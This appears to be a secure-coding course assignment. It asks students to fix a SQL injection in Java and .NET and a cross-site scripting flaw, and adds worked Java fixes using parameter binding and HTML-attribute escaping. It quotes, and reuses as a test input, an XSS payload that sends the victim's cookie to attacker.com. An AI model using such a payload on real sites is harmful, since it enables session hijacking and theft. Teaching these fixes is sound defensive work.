Reference no: EM133854367
Question: For each of the code fragments below, identify the type of software flaw(s) found and suggest a way to fix the issue(s). It is recommended that you identify the problem without using a computer. After identifying the problem, you may use a computer to verify your answer.
Code Fragment #1
The following SQL query contains a common flaw that makes it susceptible to a SQL injection attack. Using Java's PreparedStatement with variable binding, rewrite the code fragment to transform it into a secure query.
String query = "SELECT account_balance FROM user_data WHERE user_name = "
    + request.getParameter("customerName");
try {
    Statement statement = connection.createStatement( ... );
    ResultSet results = statement.executeQuery(query);
} catch (SQLException e) {
    // error handling omitted in the original fragment
}
Code Fragment #2
Using the same SQL query, rewrite the code fragment to transform it into a secure query with .NET parameterized OleDbCommand() with bind variable.
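The bind-variable version of the query in Fragment #1, as an added example written for this page rather than taken from the assignment: the `?` placeholder is compiled by the database before the value is supplied, so whatever `customerName` contains is treated as data and cannot alter the statement's structure. It assumes an open `java.sql.Connection` is passed in by the caller (for example from a servlet, with `request.getParameter("customerName")` as the second argument) and a `user_data` table with the `user_name` and `account_balance` columns the fragment implies.

```java
import java.math.BigDecimal;
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;

// Added example: the same lookup with the user-supplied value bound as a
// parameter instead of concatenated into the SQL text.
public final class SecureBalanceLookup {

    // The placeholder stands in for the value; the SQL text never changes.
    private static final String QUERY =
        "SELECT account_balance FROM user_data WHERE user_name = ?";

    // Returns the balance for customerName, or null when no row matches.
    // Assumes the caller supplies an open Connection (e.g. from a pool).
    public static BigDecimal lookupBalance(Connection connection, String customerName)
            throws SQLException {
        if (customerName == null || customerName.isEmpty()) {
            throw new IllegalArgumentException("customerName is required");
        }
        // try-with-resources closes the statement and result set on every path
        try (PreparedStatement statement = connection.prepareStatement(QUERY)) {
            statement.setString(1, customerName); // bound as data, not as SQL
            try (ResultSet results = statement.executeQuery()) {
                if (results.next()) {
                    return results.getBigDecimal("account_balance");
                }
                return null;
            }
        }
    }
}
```

The .NET rewrite asked for in Fragment #2 follows the same pattern: the OLE DB provider uses positional `?` placeholders in the command text, and the value is attached through the `OleDbCommand.Parameters` collection rather than concatenated, so the query text and the untrusted value again travel separately.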
Code Fragment #3
The following HTML code snippet is susceptible to a cross-site scripting attack. It uses untrusted data without validation or escaping. This attack causes the victim's session ID to be sent to the attacker's website, allowing the attacker to hijack the user's current session by modifying the "CC" parameter. Rewrite this code snippet to correct the security flaw.
page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";
The attacker modifies the 'CC' parameter in the browser to:
'><script>document.location= 'https://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'
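A corrected form of Fragment #3, added here as an illustration and not part of the assignment's own text: the untrusted `CC` value is first checked against the shape a card number should have and then escaped for the HTML attribute context it is written into, so the quote and angle-bracket characters in the payload above can no longer close the `value` attribute or open a `<script>` tag. The escaper is a minimal hand-written one so the file runs stand-alone; a maintained library such as the OWASP Java Encoder (`Encode.forHtmlAttribute`) is the usual choice in real code. The `isPlausibleCardNumber` rule (13 to 19 digits) is an assumption made for the example.

```java
// Added example: validation plus attribute-context escaping for the "CC" field.
public final class SafeCreditCardField {

    // Allow-list check: a card number is digits only, 13-19 long (assumed rule).
    static boolean isPlausibleCardNumber(String raw) {
        return raw != null && raw.matches("[0-9]{13,19}");
    }

    // Replace every character that could end the attribute or start markup.
    static String escapeHtmlAttribute(String raw) {
        if (raw == null) {
            return "";
        }
        StringBuilder out = new StringBuilder(raw.length() + 16);
        for (int i = 0; i < raw.length(); i++) {
            char c = raw.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#x27;"); break;
                case '/':  out.append("&#x2F;"); break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    // Builds the same <input> tag as the fragment, but never writes raw input.
    // Rejected values are echoed back escaped so the page still renders safely.
    static String creditCardField(String untrustedCc) {
        String value = isPlausibleCardNumber(untrustedCc) ? untrustedCc : "";
        return "<input name='creditcard' type='TEXT' value='"
             + escapeHtmlAttribute(value) + "'>";
    }

    public static void main(String[] args) {
        // Constructed inputs: a well-formed number and the payload quoted above.
        String good = "4111111111111111";
        String payload = "'><script>document.location="
            + "'https://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'";

        System.out.println(creditCardField(good));
        // The payload fails validation, so an empty field is rendered; even if
        // it were passed straight to the escaper, every quote and bracket would
        // be encoded and the whole string would stay inside the attribute.
        System.out.println(creditCardField(payload));
        System.out.println(escapeHtmlAttribute(payload));
    }
}
```

Escaping must match the context the data lands in: the rules above are for a quoted HTML attribute, and a value written into a JavaScript block or a URL needs a different encoder. Validation alone is not enough either, because a later change to the allow-list would silently reopen the flaw; doing both is the defensive-programming answer the assignment asks for.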
Submit a 1- to 3-page paper in APA format that contains the original code fragment, a description of the coding flaw in each, and your proposed solution using defensive programming/secure coding technique(s) to fix it.
Refer to the Week 8 Lab Rubric for specific grading elements and criteria. Your Instructor will use this grading rubric to assess your work.
Your document should be 1-3 pages long (not including the list of references and cover page), but it is the quality of the work that is important, not the number of pages. Cite and reference all sources using APA format and style guidelines and submit in a single document.